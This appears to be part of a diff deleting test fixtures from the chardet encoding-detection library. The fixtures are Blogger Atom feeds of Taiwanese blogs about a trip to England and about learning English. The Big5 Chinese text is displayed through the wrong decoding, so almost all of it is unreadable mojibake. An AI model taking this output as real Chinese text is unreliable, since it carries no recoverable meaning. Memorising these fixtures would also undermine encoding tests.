/>­÷¥‎¬O₪p¯d¨¥×O¦³»¡×÷panda-z´ֻ­­¶qש,¦n¹³¯u×÷¬O«­­¶q₪]§¦b©_¼¯©ח½ז³£¨S¬¨ל¡A¯u×÷¬O«D±`×÷¥i·R¡A¬O₪p¶װ¯S§O½׀©±­±qTokyo Hands×÷ֲd₪l¸ּ®³¥X¨׃×÷¡A₪p¶װ·|ֱ¿₪י₪ו₪F­C...©ח©ח₪ג!<br /><br /><img src="http://www.fu-design.com/blog/pic/051116PDR_2078.jpg"><br /><br />ֱ¦³³o°¦³÷µM¯א©ג¨ל¸ע²°₪l₪@¼ֻ×÷Panda-z,ֱצµM§¥»¨׃ִ±±opanda-z₪׃°׃·~₪ֶ₪F¥i¬O¯u×÷¬O¥i·R¨ל₪£¦ז×~~³s§¦bµePanda-z×÷®ֹ­װ³£¦b·Q,«ח»ע³o»ע¥i·R×!!<br /><br /><img src="http://www.fu-design.com/blog/pic/051116PDR_2076.jpg"><br /><br />µM«ב¦n¥©₪£¥©,³ּ×ס¨׃³X°§×÷¨ָ¬w₪j¾ַ×÷¦P¾ַ­ט¦n₪]°e₪F³o­׃₪pֲ§×«¡A²׳©ף¬¨ל₪ֿ¬£×ר¬ֶ»ע¼ֻ°ױ¡A¦P¾ַ­ּ¥[×o§ֶ±ז§A­ּ§@·~¦³°µ¥X¨׃¡I¡I°µ¦n¦A±Hµ¹§¬³ב¡I^^<br /><br /><img src="http://www.fu-design.com/blog/pic/051116PDR_2089.jpg"><br /><br />»¡¨ל¦n׫´N₪£±o₪£´£§×÷¦n¥S§ּ³¢«״₪W­׃₪כ¯S§O±aps2¨׃ֵ‎§×±¨ל¡u¶פ»מ¡v×÷¦³±¡¦³¸q₪§ֱ|¡A¦׃¥Bֱ°e§₪@­׃¶Wֶg₪ג¾ק¦Q¹¢¡A¶פ»מ¬O¦n×±¨ל₪£±o₪F×÷¹Cְ¸¡A§®tֲI¬°₪F¥¦¥h¶Rps2¡C¦b³¢«״×÷«¾ֹ₪U¨ג₪ׁ´N¥‏¯}₪F¡A¥i¬Oֱ¬O¦n·Q×±×......<br /><br /><a href="http://katamari.namco.com/" target=_blank>¶פ»מ×÷¬°ך÷פ¯¸</a> ¥i¥H₪U¸¶פ»מ×÷®א­±¨₪¦ג³ב¡I³¢«״¦p×G¬¨ל³o½g§ײ¥h§ל¨׃×±¡A¥i¥Hֵ‎₪‎₪l¦b®א­±₪W¶]¨׃¶]¥h³ב¡I¦׃¥Bֱ¦³×««~¥i¥H¸ֻ¦b¨­₪W¡C<br /><br /><a href="http://katamaridamacy.jp/" target=_blank>¶פ»מ×÷₪י¥»÷פ¯¸</a> ₪]«¦n×±¡A¦³«¦h¶Wֶg×÷²ֲ×F¦ט¡C<br /><br /><img src="http://www.fu-design.com/blog/pic/051116PDR_2073.jpg"><br /><br />¦A¨׃¬O₪µ₪ׁ¦¬¨ל×÷icash¥d,ֱ¡ֱ¡×÷₪@±i¦³₪@¸U¶פ³ב!!ֱצµM¬O³z©ת¥d₪£¹LֱֶZ÷}«G×÷¡A§ֱ¨S¸ױ¹L¦n¹³¸ױ³ב!·Q­n×÷§ײֱ|₪ג!!!<br /><br /><img src="http://www.fu-design.com/blog/pic/051116002.jpg"><br /><br />³o­׃¬O¦n₪ֽPuma×÷₪½¥q×÷²£«~¬¾ק³U,¥]¸ֻ¬O₪@­׃µ״ִRסA¥־ְ£§J₪Oֵר¸ֻ¯u¬O«¦³¥ק¶q¡Amoshi¬Oaevoe×÷¥t₪@­׃µP₪l,<a href="http://www.aevoe.com/" target=_blank>http://www.aevoe.com/</a>,¥L­ּ×÷²£«~½ז×÷«D±`¦n,ipod×÷®M₪l₪]«´־³ב¡I÷פ¯¸×÷°µe¬O§¾₪M×÷¡A₪j®a¥i¥H§ה₪@§ה¦³­‏¨ַ³ב¡I₪§«ב·|¦³§ף¸װ²׃×÷³ר¾ֹ¡C<br /><br /><img src="http://www.fu-design.com/blog/pic/051116PDR_2091.jpg"><br /><br />µM«ב³o¬O₪µ¦~×÷­C½ֿ¥dplus×O¡A¥[₪F¦n¬×÷¶K¯ָ¦³¨S¦³«·Q¶R,¦‎¬Oֱ¨S¾Q³f....<br /><br /><img src="http://www.fu-design.com/blog/pic/051116PDR_2090.jpg"><br /><br />³ּ«ב³o¬O₪£¶ֳµo·s¦W₪ש,·׃₪ש₪W¬₪£¥X¨׃₪£¹L·|°{°{µo¥ת³ב¡A¦]¬°¯ָ«¶Q₪W­±₪S¦³¹q¸₪£¯א¶ֳµo¡A¬O¶h«~₪₪×÷¶h«~סA­n³z¹Lֳצ«Y₪~®³×÷¨ל......<br /><br />ֱ`µ²:§¯u¬O­׃©¯÷ײ×÷₪H,ֱֱֲֲ¦U¦ל!!<br /></span> -false - - - - -Keng-Fu - -2005-11-10T18:16:00+08:00 -2005-12-14T10:51:03Z -2005-12-14T03:42:59Z - -tag:blogger.com,1999:blog-7699473.post-113453177932796088 -­^°ך₪§®ָ(₪Q₪T,₪Q¥|)-CAMBRIDGE -<img src="http://www.fu-design.com/blog/pic/uk/13/IMG_1849.jpg"><br /><br />₪p¶װ°½¯÷¡A¦]¬°²׳©ף­n¦^¥xֶW₪F¡I(₪~₪£¬O³o¼ֻ«¨¡I)<br /><span class="fullpost"><br />¦b­^°ך­ֻ¼ֶ³ּ«ב₪@₪ׁ¡A§­ּ×÷¦זµ{¬O¥h¼C¾פ¡C<br /><br /><img src="http://www.fu-design.com/blog/pic/uk/13/IMG_1853.jpg"><br /><br />¬¬₪H®a×÷¾ַ¥ְֽ\ֶU¡A¬°¬ֶ»ע§­ּ¥u¦³¥ת₪G¦§Uְ\סI<br /><br />³o¸ּ¬O¼C¾פ×÷¬׃¦Z¾ַ°|¡A¼C¾פ¬O¦n´X­׃¾ַ°|²ױ¦¨×÷₪j¾ַ«°¡A¸װ²׃×÷₪¶²׀₪j®aֱ¬O¥hֲ½®ׁ§a¡I¡I<br /><br /><img src="http://www.fu-design.com/blog/pic/uk/13/IMG_1858.jpg"><br /><br />¼C¾פ¦W²£¡u±d×e¼µ¿t¡v¡A´N¬O₪j¾ַ¾ַ¥ֽ·|¦Eµ²מ±a¹C«ָ©µ×e×Y½א¬´÷¡A¬¬³o¨ֱַ¦Y°_ֲ׳´I×÷₪jְ\₪F¡A¯u¬O®צ¶O..₪£...¬O®צ÷©..§µL×k·Q¹³¦b¦¨¥\´ע°µ³o¨ַ¨ֶ¬O¬ֶ»ע·Pִ±¡C<br /><br /><img src="http://www.fu-design.com/blog/pic/uk/13/IMG_1863.jpg"><br /><br />¬JµM¨׃₪F´N¸ֻ₪@₪U®נ½ט¡C<br /><br /><img src="http://www.fu-design.com/blog/pic/uk/13/IMG_1874.jpg"><br /><br />¦p×G«ב­±×÷₪T¨₪¥ױ´׳¦A§C₪@ֲI´N«¹³¦bְ¹´U₪l₪F....<br /><br /><img src="http://www.fu-design.com/blog/pic/uk/13/IMG_1877.jpg"><br /><br />₪p¶װ¥u­n¦Y¨ל¦B²N²O¾ד­׃₪±¡´N¦n°_¨׃¡A¬O¾ײ¦³¡u¦B²N²O§ײ¼ײ¡v×G¹ך¯א₪O×÷₪k₪H¡C<br /><br />§«·Q×¾¹D¦b³oֳהֵ×®ׁ¬O¬ֶ»ע·Pִ±¡A¶Q±¶¡H·|ֳM°¨¶¡H³oֳה×÷¾ַ¥ֽ·|¥´ֵ]ֳ~¶¡H¥L­ּ·|¦Yֲ±ֶ¶¡H₪ׁ×§₪׃·Q×¾¹D³o¨ַ°ֳD₪F...<br /><br />µM«ב´N¦^¨ל­´°₪F¡A³oֳה¬O¬ל×ג¶י×÷µףְYְֳ₪H<br /><br /><img src="http://www.fu-design.com/blog/pic/uk/13/IMG_1883.jpg"><br /><br /><img src="http://www.fu-design.com/blog/pic/uk/13/IMG_1886.jpg"><br /><br />¬ל×ג¶י₪j·§¬O§°₪@³ֵw­´°×÷¦a₪ט§a¡I¦³¼ֶ₪£²M×÷µףְYְֳ₪H¦׃¥B₪£·|³Qִµ¹מ°l¡A¦׃¥B«D±`±M·~₪£¬O¹³¥xֶW³£«´d±¡¨÷÷״¡AµףְYְֳ₪H¬O¸׃±aµ¹₪H­ֵּw¯÷×÷..§¬O³o»ע·Q×÷....<br /><br />­^°ך¦ז¦b³oֳה§i₪@­׃¬q¸¨¡A¥ׁ©ף«e₪@₪ׁ₪w¸g₪U₪F₪@¨ַµ²½׳®`±o³o₪@½g¬°_¨׃¯ף¯ףµ²§פ¡A¦‎¨ֳ₪£¬O³o¼ֻ×÷¡A¬O¦]¬°§¨{₪l¾j₪F·Q¦Y₪ְָ\¥h₪F¡A(¨÷´N¬O¯ף¯ףµ²§פסI)¡A¹ן©ף­^°ך§«ֳר₪@¦¸»¡§¹¹ן¥¦×÷·P·Q¡A¦]¬°­^°ך₪׃₪j₪F¡A¦³µ¼ֶ₪£²M×÷­±»×¡A₪£¬O¨÷÷״¥xֶW´N¥i¥H»¡¡u₪pֵ¢¥]¦n¦Y¡A₪H«¦ג..₪£.¬O¼צ±¡¡v³o¼ֻ¨ג¥y¸´N¥i¥H¥ז¥N§¹¡A©ׂ¥H¡A§×÷µ²½׳¬O..§­n¥h¦Y«K·ם₪F...<br /><br /><img src="http://www.fu-design.com/blog/pic/uk/13/IMG_1914.jpg"><br /><br />×‏±a×÷¬O§­ּ¦b¦^µ{×÷­¸¾ק₪W¸ע¥L­ּ­n¼³§JµP¦]¬°₪p¶װ­nֵֵ]³Nµ¹§¬¡Aµ²×G°ף°ף₪@­׃®ץ¯ט¾ד¬[­¸¾ק₪W¨S¦³¼³§JµP¡A×ֵ©j´Nµ¹§­ּ³o­׃×F¦ט×±¡A§A·ם§­ּ¬O₪T·³₪p«ִ¶¡H¡H³o¬O₪@­׃§ג₪ט¶פֲא₪@ֲא´N¥i¥H«ק¦¨₪@­±¹ֿ×÷×±¨ד¡A§««ב®¬§ג¥¦¥ב₪F...ְ³¸׃₪W÷פ©ח½ז¬¬....<br /><br /></span> -false - - - - -Keng-Fu - -2005-11-10T14:08:00+08:00 -2005-12-14T02:53:03Z -2005-12-14T02:50:16Z - -tag:blogger.com,1999:blog-7699473.post-113452861607508106 -­^°ך₪§®ָ(₪Q₪G)-ֱ¬OLONDON -<img src="http://www.fu-design.com/blog/pic/uk/12/IMG_1740.jpg"><br /><br />¨S¿ש¡A´N¬O³o»ע¶װ³ׂ¡A§§ײ¼g§¹₪F¡A³o¬O­ֻ¼ֶ²ִ₪G₪ׁ¡A¨S·Q¨ל¼g¹C°O×ב×÷®ֹ¶¡₪ס¥X¥h×±ֱ₪[¡C<br /><br />₪W­±³o±i·׃₪ש¬O₪j®a¦b¥ױ×ק÷~®c«e­±µ¥¸T½ֳ­x¥ז±µ¡A¥~°ך₪H₪]¦³×¦¨ל»ֹ¹³₪W×÷ֳa²÷D¡A¦׃¥B§A­ּ¨÷­׃¥ױ¦ח×A×÷¨k×÷§גְY©ס¦b¨÷ֳה·F¬ֶ»ע¯u¬O²²ֱyסA­^°ך₪H₪׃¶}©ס₪F¡C<br /><span class="fullpost"><br /><img src="http://www.fu-design.com/blog/pic/uk/12/IMG_1743.jpg"><br /><br />¬ץ¾v×±C³Qִµ¹מ»°₪U¨׃₪£­n§₪¦b¨÷₪W­±¡A₪₪₪«D±`₪£´r§ײ¡A©ׂ¥HְY¾v´Nֵ¬ץ₪F¡C<br /><br /><img src="http://www.fu-design.com/blog/pic/uk/12/IMG_1776.jpg"><br /><br />¯ה¦ׁ¥~₪@×½·׃¬O­n¥־¬¾ק¨M°«¬O§a¡I¡H§­ּ´N³o¼ֻ₪¬·׃µ»ר«ש₪£₪U¡A³o¬O¨k₪H×÷´LִYסI¡I(¬O¶¡I¡H)<br /><br /><img src="http://www.fu-design.com/blog/pic/uk/12/IMG_1795.jpg"><br /><br />¥D¨₪¬O«ב₪ט×÷°¨₪j«K¡A¨e­ּ¥i¥H₪@ֳה¨«₪@ֳה₪j¡A³o´N¬O©ׂ¿׳×÷¡u¦ז°₪j«K¡v¶¡H<br /><br /><img src="http://www.fu-design.com/blog/pic/uk/12/IMG_1796.jpg"><br /><br />§­ּ«D±`³ֵw­^°ך×÷W&S°׃©±¡A¸ּ­±₪£¦‎¦³«¦h§O×÷¦a₪ט¶R₪£¨ל×÷­¹×«¡A³s¥]¸ֻ³£«¦³³]­p·P¡A¹³¬O³o­׃¬v¬ע₪ש×÷¥]¸ֻ₪׃¦³½ט·P₪F¡A¦׃¥Bֱ¦³¦U÷״₪f¨‎¡AW&S¬O³sֲך©±¡A«¦h¦a₪ט³£¥i¥H¬±o¨ל¡A¬ל×ג¶י¼s³ץ¨÷ֳהֱ¦³₪@®a¶W₪j×÷÷Xֵ²©±³ב¡I¡I<br /><br /><img src="http://www.fu-design.com/blog/pic/uk/12/IMG_1797.jpg"><br /><br />³o­׃´N¬OW&S×÷×G¥ִ¡A«D±`×÷¦n³¡A³s§₪£³ֵw³×G¥ִ×÷₪H₪]·R₪W¥¦₪F¡A«¦n³³ב¡I¡I<br /><br /><img src="http://www.fu-design.com/blog/pic/uk/12/IMG_1800.jpg"><br /><br />²ן¯־ְפ²y¼@³ץ¡A×ב₪F¦n₪j×÷¥\₪ׂ₪~§ה¨ל¡A«ב­±¨÷´X­׃×ר³TCOSPLAY₪Hְ³¸׃¬O¸ּ­±×÷₪u§@₪H­§a¡I¡I<br /><br /><img src="http://www.fu-design.com/blog/pic/uk/12/IMG_1803.jpg"><br /><br />¾פ««׃¡A₪H¥i·R¡C<br /><br /><img src="http://www.fu-design.com/blog/pic/uk/12/IMG_1810.jpg"><br /><br />TATE MODERN ­n¨ל®ץ¼w²{¥Nְֳ³Nְ]­n©¹₪W¨«.....¬O¦b×ֵ®q₪W¶¡H<br /><br /><img src="http://www.fu-design.com/blog/pic/uk/12/IMG_1815.jpg"><br /><br />µףְYְֳ₪H§j..§j...§j³o­׃..³o­׃¬O.²ֱֶ¬O¬ֶ»ע¨׃µ..§j¼ײ¾¹¡I¡I<br /><br /><img src="http://www.fu-design.com/blog/pic/uk/12/IMG_1833.jpg"><br /><br />¬±o²M·¡­^°ך¦aֵK°k¥ֽ¼׃±ט®ַ×÷µP₪l¼g¬ֶ»ע¶¡H<br />The stairway has 175 steps...₪@¦₪C₪Q₪­¶¥×¡Iֱ¥s₪j®a₪£¬O¦MְI±¡×p×÷®ֹ­װ₪£­n¥־¡A¦³₪H³o»עµL²ב¥h¨«¶¡H§­ּ´N¨«¹L..¦]¬°¨S¬¨לµP₪l·Q»¡¡u¨«¼׃±ט₪ס¸§ײ¡v¡A³o­׃ֶ[©ְ¥u¦³¦b¥x¥_±¶¹B¦ז±o³q...<br /><br />­´°×÷²ִ₪G₪ׁ§­ּ´N¦b¥|³Bֲפ¿÷₪U´ח¹L₪F¡A₪]³\¬O§b±o®ֹ¶¡₪׃µu¡A§­ּ«ֳר³ֵw₪W³o­׃«°¥«¡A₪£¿ֻ₪ֱ×÷₪H¡A₪£¿ֻ₪ֱ×÷₪j²³₪u¨ד¡Aֱ¦³₪£¿ֻ₪ֱ×÷»ש¿ת¡A¦n¹³₪£°±×÷§i¶D§A¡u¦³¿ת¦׃¥B¬O­^°ך₪H×÷₪~¬O¦ׁ₪j¡v¡A§­ּ¬¨ל×÷³\¦h­±»×³£¬Oֵ¼¶ֳ¥j¦ׁ©M§N÷z×÷¡A¦³ֲI¹³§A­ט±q¥x«n¶m₪U¨׃¨ל¥x¥_³o­׃₪j«°¥«×÷·Pִ±¡A¨ל³B³£¬O₪Hֱ¦³µׂ¡A¥u¬O³o­׃·Pִ±¦A±j¯P­׃´X¦­¿¡C<br /><br />¥~°ך₪H¬«¶ְ÷״₪H×÷÷A«׳ֵד¦׃©צ¨£¡A¦]¬°¥L­ּ×÷ֱ~¸ך©ׂ±o¬O§­ּ×÷₪T­¿¡A³o÷״¹ן₪ס´N¹³§­ּ¦b¥xֶW¬«×F«n¨ָ³ׂ₪u×÷÷A«׳¡Aֲֲ¶¥¯ֵ¨מ«׳₪U³s­^°ך₪H¥»¨­³£¥i¥H₪ְ¦¨¶Q±¸ע¥­¥ֱ₪F¡A§ף¦ף×p¥~¨׃₪H÷״¡C₪£¬O©ׂ¦³­^°ך₪H³£³o¼ֻ×÷¡A¦‎¬O¶m§ר×÷­^°ך¸ע³£¥«×÷­^°ך·Pִ±´N¹³¨÷¨I­«×÷175¶¥¼׃±ט³o»ע»·...<br /><br />׫±»¡­´°¬O©µ¦ׁ¥ײ×÷«°¥«¡A­n×בֲI®ֹ¶¡₪~¯א¬¨ל¥¦ְֳ³N»P₪H₪ו×÷₪@­±¡A«¥i±₪§­ּ®ֹ¶¡₪£¦h¿ת₪]₪£°ק¦h¡A¦^¨ל¥xֶW«ב§₪@×½·Q§ה₪H±ְֲ½§¹ן­´°₪£¦n×÷¦L¶H¡A¦‎±o¨ל×÷µ×®׳´X¥G³£¬O¦³ֲI­t­±×÷¡A§«₪p×÷®ֹ­װ´N¨׃¹L­´°₪@¦¸¡A₪U¨®©ח·׃₪W¨®÷־ִ±×÷®ָ¦ז¹־×GµM¬O₪£¯א·P¨₪@­׃«°¥«³ּ¯u¹ך×÷₪@­±×¡I<br /><br /><br /><br /><br /><br /></span> -false - - - - -Keng-Fu - -2005-11-10T11:13:00+08:00 -2005-12-13T16:42:11Z -2005-12-13T16:30:55Z - -tag:blogger.com,1999:blog-7699473.post-113449145589893090 -­^°ך₪§®ָ(₪Q₪@)--London -<img src="http://www.fu-design.com/blog/pic/uk/11/IMG_1689.jpg"><br /><br />¦n§­ּ«¦×÷₪@₪U¨׃¨ל₪F­´°¡A₪W­±³o®a¬O¸¹÷¶W¦n¦Y¶W₪j¸J¶W«K©y×÷₪י¥»®ֶ²z¡A¦b­´°µ´µ¯S¼s³ץ×‏×ס¡A§A­ּ¬¬±ֶ³o»ע¦h₪H¬O«ח»ע¼ֻ¡Aµ²×G¨ה¹ך¦Y°_¨׃¸ע¥x«n¨|¼ײµף«K·ם®t₪£¦h¡A±q«e¦b¥x«n¦Y₪£¹¡ֱ¥i¥H¥[¶÷©O¡I·|¯א»¡¥X³o»ע₪₪×ײ×÷·N¨£×÷­ל¦]¬O§­ּ₪]±ֶ₪F¥b­׃₪p®ֹ¦h₪~¦Y¨ל...<br /><br /><span class="fullpost"><br /><br />§¹ן­´°²ִ₪@¦L¶H¬O§₪¦aֵK¥u§₪₪F₪@¯¸´N­n­^½S2₪¸¡Aֲ²³ז×÷»¡´N¬O§A±q©¾§µ´°₪ֶ°µ¨ל©¾§µ´_¿³¯¸´N­n¥x¹פ120₪¸×¦U¦ל¡A³o¬O¦X×k·m§T¶¡I<br /><br /><img src="http://www.fu-design.com/blog/pic/uk/11/IMG_1691.jpg"><br /><br />¥´¹q¸µ¹×«±¦‎¨S¦³³qµM«ב´N³Q¦Y¿ת¡A¦Y¨ל¥x¹פ₪@¦¶פ¥×¥k×÷®ֹ­װ§´N©ס±ף₪F...<br /><br /><img src="http://www.fu-design.com/blog/pic/uk/11/IMG_1693.jpg"><br /><br />«ב­±´N¬O¦³₪j²ֱֲִ×÷°ך·|¡A³o±i¬O¨ו«¬×÷­·´÷·׃¡A¦p×G¨S®ֹ¶¡¥X°ך¥i¥H¥h§ה¦³³o÷״®ִ×G×÷₪jְY¶K₪]¥i¥Hֵ‎§Aְפ¹C¥@¬ֹ³ב¡I<br /><br /><img src="http://www.fu-design.com/blog/pic/uk/11/IMG_1695.jpg"><br /><br />«ב­±¬OֳM§L¡A««׃¦‎¬O§«·Q×¾¹D§₪₪F₪@₪ׁ₪U₪F°¨₪§«ב¨«¸פ·|¬O¬ֶ»ע¼ֻ₪l¡C<br /><br /><img src="http://www.fu-design.com/blog/pic/uk/11/IMG_1696.jpg"><br /><br />÷־µ₪F¶¡H<br /><br /><img src="http://www.fu-design.com/blog/pic/uk/11/IMG_1706.jpg"><br /><br />¥D¨₪¬O¡u­´°₪§²´¡v¼¯₪ׁ­¡A³o­׃¼¯₪ׁ­¬O₪@­׃¥]´[¯¸₪@°ן₪H¡A¨S¿ש¡A¥־¯¸×÷­C¡IµM«ב­n¦b¸ּ­±¯¸₪@­׃₪p®ֵֹ¥»¡¡A¥~°ך₪H¯u¬Oֱo©ת¨ל¹C«ָ­n×ב¿ת»@¯¸.....<br /><br /><img src="http://www.fu-design.com/blog/pic/uk/11/IMG_1714.jpg"><br /><br />¦ׁ₪H®ָ¹C¹־¡A₪£×¾¹D¬°¬ֶ»ע¥L­ּ×÷¦ׁ₪H¹־·Pִ±´N₪ס¥xֶW×÷×₪½×¶‎¹C¼ך´ע¹חְR×÷¦h¡A¨S¦³¨÷÷״®£©ֶ×÷µֲ±‏®נ×^.......<br /><br /><img src="http://www.fu-design.com/blog/pic/uk/11/IMG_1726.jpg"><br /><br />¼ײ°×°µ¦¨×÷«¢§Q×i¯S³ב¡A³o₪U₪l¦ע¦aֵ]²׳©ף¥i¥Hֵ‎§A¥|₪ְ₪­µץ₪F§a­ף­ף¡I<br /><br /><img src="http://www.fu-design.com/blog/pic/uk/11/IMG_1732.jpg"><br /><br />¦n₪£®e©צ§­ּ¦b¥b»ש²¼«F²׳©ף¶R¨ל₪F¡u×¥[­פ¡v×÷²¼¡A¦b­´°¬₪F₪@³ץ«D±`¦n¬×÷÷q¼@ִ±±o¦n÷¡¨¬¡A«U¸»¡¡u¨׃­´°´N¬O­n¬³ץ÷q¼@¡v₪£¬O¨S¦³¹D²z×÷¡A§A·|µo²{¥@¬ֹ₪W¯u×÷¦³₪@¸s¨k₪k«׃¬¨ל₪£¦ז¦׃¥B·|°·|¸ץ¡A¥­¥­³£¬O¦a²y₪H¬°¬ֶ»ע³o»ע¼F®`©O¡Hֱ¦³×¥[­פ¬O©ׂ¦³÷q¼@¸ּ¦ח×A¬ן³ּ₪ײ×÷¡A¦p×G©ָµL²ב©ָ÷־µ¬³o­׃´N¹ן₪F¡A₪ׁ×§³o»עֱ¿¦n¹³¬ץ¥]³ץ×÷¦ג¦ְׁY......<br /><br /></span> -false - - - - -Keng-Fu - -2005-11-10T10:37:00+08:00 -2005-12-13T16:12:32Z -2005-12-13T16:09:44Z - -tag:blogger.com,1999:blog-7699473.post-113449018470215189 -­^°ך₪§®ָ(₪E₪Q)-¦^¨לSheffield×÷¨ג₪ׁ -<img src="http://www.fu-design.com/blog/pic/uk/9/IMG_1630.jpg"><br /><br />¬O×÷¡A§₪Sִ~ִע¶}©l¼g₪F¡A¦]¬°¦A₪£¼g§´N­n¥h₪י¥»×±₪F¡A¨ל®ֹ­װ§₪@©w·|§ׁ¥ת¥ת¡AֱצµM¨S¦³₪H¶¡A¨S¦³₪H°§×±µ₪U¨׃©O¡A§ֱ¬O¦₪v¨ִ¨ִ×÷¶}©l§a¡I<br /><br />±qִ¬®זִץ¦^¨׃«ב¦A©n©n®a¦A¨ֹ¨₪F¨ג₪ׁµ־×A×÷₪י₪l¡A¹Lµ°£₪F¦Y¶÷¶RµזµN×F¦טֱ¦³÷־ִ±×÷₪י₪l¡A·P¨ל«D±`×÷´g·N¡C<br /><br /><span class="fullpost"><br /><br />¨÷¦]¬°Sheffield₪§«e₪w¸g₪¶²׀¹L₪F¡Aֵ‎§­ּ§ײ³t×÷¬¹ֿ»¡¬G¨ֶ§a¡I¡I<br /><br /><img src="http://www.fu-design.com/blog/pic/uk/9/IMG_1631.jpg"><br /><br />³o¬O§©n¡A¦³¨k₪ֽ¦‎³ז¨­¡A­ט¦n¦o­n§¦^µ×₪­­׃°ֳD¡A¨÷§´N¶}©l₪F¡I¡I<br /><br />Q1.§A³ּ³ֵw¥xֶW×÷­‏­׃¦a₪ט¡H<br />₪T×צְֳ³N₪j¦a<br /><br />Q2.°²¦p§A·Q­n¾i¦ׁ¡A·|¿ן¦b­‏­׃¦a₪ט§@¬°¾i¦ׁ×÷¦aֲI¡H <br />¥x«n<br /> <br />Q3.°²¦p₪U½ת₪l§כ­L¡A§A·|·Q°µ­‏°ך₪H?<br />¦³¿ת₪H<br /><br />Q4.²{¦b§A³ּ·Q¥h­‏₪@­׃°ך®a×±?<br />₪י¥»<br /><br />Q5.§A³ּ³ֵw¥@¬ֹ₪W­‏₪@­׃«°¥«¡H<br />×F¨<br /><br />¦n§¦^µ×§¹₪F¡I<br /><br /><img src="http://www.fu-design.com/blog/pic/uk/9/IMG_1632.jpg"><br /><br />³o¬O¥‏¬O´צ°ֽ°µ×÷×רְV³ְ¡A¸ֻ¸mְֳ³NצU¦ל¡A«צ¶sֱ·|°¡A¬O¸U÷ֿ₪‎×÷ֳd׫¶¡H<br /><br /><img src="http://www.fu-design.com/blog/pic/uk/9/IMG_1634.jpg"><br /><br />©n©n»P₪j³°¦P­M´¹´¹¡AֱצµM¨ה¹ך¬O¨k×B₪ֽ¦‎ֱ¬Oֵw×ן¦³¿ת₪S­^«T×÷₪H¸ע¦o°µ×B₪ֽ¡C<br /><br /><img src="http://www.fu-design.com/blog/pic/uk/9/IMG_1662.jpg"><br /><br />³o¬O§×B₪ֽMars¸עJoart×÷T-shirt<br /><a href="www.t-code.cc" target=_blank>Tcode</a><br />©ת¦~§­ּ·|₪@°_¦X§@±ְ¥X¨j³]­p×÷¾ק¾¹₪HT³ב¡I¡I<br />¯S§O±a¨ל­^°ך©ח₪@±i¡A¦³¨S¦³°ך»₪ֶ°_¨׃¡I<br /><br /><img src="http://www.fu-design.com/blog/pic/uk/9/IMG_1679.jpg"><br /><br />ֱ¦³¼y¯¬₪p¶װ¥ֽ₪י¡A¦‎¬O¦o¦£µ¦b×±¡u¼ְְׂ¥«¥ֱ¡v¡A¦n·P­ֵָ§C¡A₪p¶װ©p»­n±N×ְ¥ז­ָ´£₪ֹ₪F©p¡C<br /><br />«D±`§ײ³t×÷¡A₪U₪@½g§­ּ­n¨׃¨ל­´°₪F³ב­C¡A¥¿©ׂ¿׳¥ת³±¦¼CסI<br /><br />³o₪£¥s°½ֳi¡A¬O¿@ֱY×..¬O¿@ֱY¡I¡I<br /></span> -false - - - - -Keng-Fu - -2005-10-19T01:10:00+08:00 -2005-12-14T03:07:45Z -2005-11-10T10:11:14Z - -tag:blogger.com,1999:blog-7699473.post-113161747473397226 -­^°ך₪§®ָ -<img src="http://www.fu-design.com/blog/pic/051013england1.jpg"><br /><br />¾ד²z¨ל³o¨׃₪F:<br /><a href="http://fudesign.blogspot.com/2000/10/taichung-sheffield.html">­^°ך₪§®ָ(₪@)Taichung--Sheffield</a><br /><a href="http://fudesign.blogspot.com/2000/10/sheffield-manchester.html">­^°ך₪§®ָ(₪G)Sheffield--Manchester</a><br /><a href="http://fudesign.blogspot.com/2000/10/sheffield.html">­^°ך₪§®ָ(₪T)Sheffield</a><br /><a href="http://fudesign.blogspot.com/2000/10/sheffield-york.html">­^°ך₪§®ָ(¥|)Sheffield--York</a><br /><a href="http://fudesign.blogspot.com/2000/10/edinburgh.html">­^°ך₪§®ָ¨׃¨לִ¬®זִץ₪F(₪­)Edinburgh</a><br /><a href="http://fudesign.blogspot.com/2000/10/glasgow.html">­^°ך₪§®ָ(₪»)-Glasgow</a><br /><a href="http://fudesign.blogspot.com/2000/11/edinburgh.html">­^°ך₪§®ָ(₪C₪K)-Edinburgh</a><br /><br /><span class="fullpost"></span> -false - -
    diff --git a/chardet/tests/Big5/kafkatseng.blogspot.com.xml b/chardet/tests/Big5/kafkatseng.blogspot.com.xml deleted file mode 100644 index ac0d69c..0000000 --- a/chardet/tests/Big5/kafkatseng.blogspot.com.xml +++ /dev/null @@ -1,62 +0,0 @@ - - - - - - -KAFKA1967 - - -tag:blogger.com,1999:blog-7754027 -2005-12-30T09:06:19Z -Blogger - -
    This is an Atom formatted XML site feed. It is intended to be viewed in a Newsreader or syndicated to another site. Please visit the Blogger Help for more info.
    -
    -true - - - -KAFKA - -2005-12-30T10:37:00+08:00 -2005-12-30T09:06:19Z -2005-12-30T03:33:51Z - -tag:blogger.com,1999:blog-7754027.post-113591363179023562 -¾ַ­^₪ו¬O³ּ­@₪[×÷´c¹ -<img src="http://home.texoma.net/~kgreg/nightmare.jpg" alt=home.texoma.net><br /><br />±q18·³¶}©l<br />´N¬°¾ַ¦n­^₪ו¦׃µh­Wµ<br />¨ל₪F20·³₪U©w¨M₪<br />­n×ב¿ת¦n¦n¥־¥\₪@µf<br />½ײ×¾¹D<br />´N¦b²ֿ²ֿ¹ך¹ך₪W₪Fµo­µ¯Z<br />°עֲ¦₪@,₪G¯ֵ«ב<br />(³o¼ֻ´N¥b¦~₪F³ב)<br />«o¦]¬°¦₪v·Q§ג¥‏³¡₪₪O§כ₪Jֲ¾³ץ<br />¦׃©¿²₪₪F¨ה¹ךֲ¾³ץ¹ן­^₪ו×÷»­n<br />»·»·₪j¹Lֱp¦ׂ×÷»­n<br /><br />₪@­׃¿ש»~×÷¨M©w<br />³y´N₪F¥b½ת₪l×÷ֱ־¶Y<br /><br />₪@¶}©l­^₪ו·|₪£¦n¬O³o¼ֻ×÷<br />¥»¨׃¦b¶i°ך₪₪«e<br />₪ק¥ְ¦b¸gְ₪£¼e¸־×÷±¡×p₪U<br />ֱ¬Oֵ‎§¥‎¦b´»°²¸ֹ²­^₪ו<br />°O±o«²M·¡×÷¬O<br />¨÷¦¸¸ֹ²ֱצµM¥u¦³₪@­׃¥b₪כ<br />¦‎₪wֵ‎§×÷³ז¦r,­^¼׀,µo­µ,ֲ²³ז³y¥y<br />³£¥´₪F₪£¿ש×÷©³<br />¦‎₪£©¯<br />¦ף¨ה₪£©¯<br />§°ך₪₪×÷­^₪ו¦ׁ®v<br />³÷¬O­׃³s¦₪vֱ¿¥X¨׃×÷­^₪ו<br 